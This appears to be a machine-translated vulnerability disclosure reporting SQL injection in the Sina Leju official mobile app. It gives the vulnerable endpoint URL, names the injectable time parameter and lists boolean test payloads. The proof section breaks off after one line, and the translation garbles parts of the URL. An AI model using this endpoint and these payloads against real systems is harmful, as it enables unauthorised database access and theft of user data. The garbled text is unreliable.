漏洞标题 新浪乐居官方APP有SQL注入（涉及30W +用户数据） 相关制造商 Leju.com 漏洞作者 过路人 提交时间 2016-04-25 09: 30 公共时间 2016-06-09 09: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标：新浪乐居官方APP 测试在以下地方发现SQL注入:(注入参数时间，联合查询/布尔盲） http://mf.m.leju.com/v4/recommend/news.json?uuid=9b4b25ba3eeef889915f2411baa2fb00680e0bb6&system=iPhone%20OS9.3.1&idfa=564443CC-9189-42C1-9CC9-0922116AD5*&gather_x=114.040960&time=1461481713＆安培;源=APPSTORE＆安培; OS=IOS＆安培; gather_y=22.611311＆安培;城市=SH＆安培; openuuid=196510DC30782F568F1853FF4C20665F＆安培;页=1＆安培;的AppKey=2408231234＆安培;模型=iPhone＆安培; v=4.0 有效载荷： 时间=1461481713，1=1 时间=1461481713，1=2 漏洞证明： 1，当前数据库用户 Failure when receiving data from the peer